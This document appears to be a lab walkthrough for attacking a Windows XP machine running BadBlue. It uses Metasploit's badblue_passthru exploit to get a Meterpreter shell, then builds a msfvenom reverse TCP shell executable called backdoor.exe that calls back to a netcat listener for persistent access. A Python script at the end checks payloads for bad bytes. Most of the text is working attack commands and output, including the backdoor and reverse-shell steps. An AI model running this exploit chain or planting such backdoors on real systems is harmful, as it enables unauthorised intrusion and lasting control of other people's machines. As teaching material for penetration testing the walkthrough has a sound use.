Windows XP Professional 32-bit
Running BadBlue Enterprise Edition, a web server for Windows
Breakdown
We'll use Metasploit to exploit the BadBlue service and deliver a payload to the target, with the goal of getting a command shell on the box and then leaving ourselves a way back in.
MSFCONSOLE
In the following example we use a known vulnerability in BadBlue to get onto the target and open a remote shell.
# Start msfconsole as root
kali@kali:~$ sudo msfconsole
msf5 >

# Search for BadBlue exploit modules
msf5 > search badblue
0  exploit/windows/http/badblue_ext_overflow
1  exploit/windows/http/badblue_passthru

# Select the second result (index 1), the PassThru buffer overflow
msf5 > use 1
msf5 exploit(windows/http/badblue_passthru) > show options

Name     Setting       Required
----     -------       --------
Proxies                no
RHOSTS   192.168.0.1   yes
RPORT    80            yes
SSL      false         no
VHOST                  no

# Point the module at the target and fire
msf5 exploit(windows/http/badblue_passthru) > set rhosts 192.168.0.1
rhosts => 192.168.0.1
msf5 exploit(windows/http/badblue_passthru) > run
[*] Meterpreter session 2 opened (192.168.0.102:1054) at 2020-11-11 01:25:33

# Drop from Meterpreter into a Windows command shell
meterpreter > shell
C:\Program Files\BadBlue\EE>
We now have a shell on the target through the exploit session. That shell lives and dies with the Meterpreter session, so the next step is to generate a standalone reverse-shell executable with msfvenom, copy it to the target and run it there as a backdoor that does not depend on re-running the exploit.
# Generate the payload: a reverse TCP command shell that calls back to the Kali box on port 1234
kali@kali:~$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.102 LPORT=1234 -a x86 -b "\x00\x0a\x0d" -f exe > backdoor.exe

Here -a x86 matches the 32-bit target, -b makes msfvenom pick an encoder that keeps NUL and CR/LF bytes out of the shellcode, and -f exe wraps the encoded shellcode in a Windows executable. The -b list matters when shellcode has to survive inside an HTTP request, where 0x00 ends a C string and 0x0d 0x0a ends a header line; for a file we upload and run ourselves, as here, it is harmless but not required.
# Copy backdoor.exe to the target through the Meterpreter session (its upload command)
# and the command shell we already have, then start a netcat listener on the callback port
kali@kali:~$ nc -vlp 1234
listening on [any] 1234 ...

# Once backdoor.exe is run on the target it connects back to us
connect to [192.168.0.102] from (UNKNOWN) [192.168.0.1] 1056
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\User\Desktop>
# We now have a second shell on the target, independent of the exploit session, that we can reconnect to whenever backdoor.exe runs
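Before relying on an encoded payload it is worth confirming that the encoder actually honoured the -b list, particularly when the shellcode will travel inside an HTTP request. The Python below is an added example, not part of the original write-up or of Metasploit: it parses msfvenom's \xNN bad-character syntax and scans a raw payload (assumed to have been produced with -f raw -o backdoor.raw; the file name is an assumption) for offending bytes and their offsets. It also flags PE files, because the -f exe output used above starts with MZ and contains NUL bytes by design, so the -b constraint only applies to the embedded shellcode and a scan over the whole executable would report false hits. The sample blobs are constructed, not real shellcode.

```python
#!/usr/bin/env python3
r"""Added example (not from the original write-up): check msfvenom output
against a bad-character list such as the -b "\x00\x0a\x0d" used above."""
import re
import sys
from typing import Dict, List, Tuple


def parse_badchars(spec: str) -> bytes:
    r"""Convert msfvenom's -b syntax, e.g. "\x00\x0a\x0d", into bytes."""
    hexes = re.findall(r"\\x([0-9a-fA-F]{2})", spec)
    if not hexes:
        raise ValueError(f"no \\xNN escapes in bad-character spec {spec!r}")
    return bytes(int(h, 16) for h in hexes)


def scan_for_badchars(blob: bytes, badchars: bytes) -> List[Tuple[int, int]]:
    """Return (offset, byte) for every forbidden byte found in blob."""
    forbidden = set(badchars)
    return [(off, b) for off, b in enumerate(blob) if b in forbidden]


def check_payload(blob: bytes, spec: str) -> Dict[str, object]:
    """Summarise a payload: size, PE-or-not, and where the bad bytes are.

    A PE file (MZ header, as produced by -f exe) legitimately contains NUL
    bytes, so a hit list for it says nothing about the embedded shellcode;
    run this on -f raw output instead.
    """
    hits = scan_for_badchars(blob, parse_badchars(spec))
    return {
        "size": len(blob),
        "is_pe": blob[:2] == b"MZ",
        "clean": not hits,
        "hits": hits,
    }


# Constructed sample blobs (not real shellcode). CLEAN avoids 0x00/0x0a/0x0d
# entirely; DIRTY has a NUL at offset 2 and CR LF at offsets 5 and 6, the
# bytes that would truncate a C string or end an HTTP header line.
CLEAN = bytes(range(0x01, 0x0a)) + bytes(range(0x0b, 0x0d)) + bytes(range(0x0e, 0x20))
DIRTY = b"\x90\x90\x00\x31\xc0\x0d\x0a\xcc"
BADCHARS = r"\x00\x0a\x0d"  # the same list passed to msfvenom -b above


def report(path: str, spec: str = BADCHARS) -> int:
    """Scan a file (e.g. msfvenom -f raw -o backdoor.raw) and print findings.

    Exit code 0: clean, 1: bad bytes found, 2: PE file (scan not meaningful).
    """
    with open(path, "rb") as fh:
        result = check_payload(fh.read(), spec)
    if result["is_pe"]:
        print(f"{path}: PE file, bad-char scan is not meaningful (use -f raw)")
        return 2
    if result["clean"]:
        print(f"{path}: {result['size']} bytes, no bad characters")
        return 0
    for off, b in result["hits"]:
        print(f"{path}: forbidden byte 0x{b:02x} at offset {off}")
    return 1


if __name__ == "__main__":
    # Usage: python3 badchar_check.py backdoor.raw   (file name is an assumption)
    if len(sys.argv) != 2:
        print("usage: badchar_check.py <raw payload file>", file=sys.stderr)
        sys.exit(2)
    sys.exit(report(sys.argv[1]))
```

Run it against the -f raw version of the same payload; a non-zero exit means either the encoder left a forbidden byte in place (try a different -e encoder or iterate with -i) or you pointed it at the .exe wrapper rather than the shellcode.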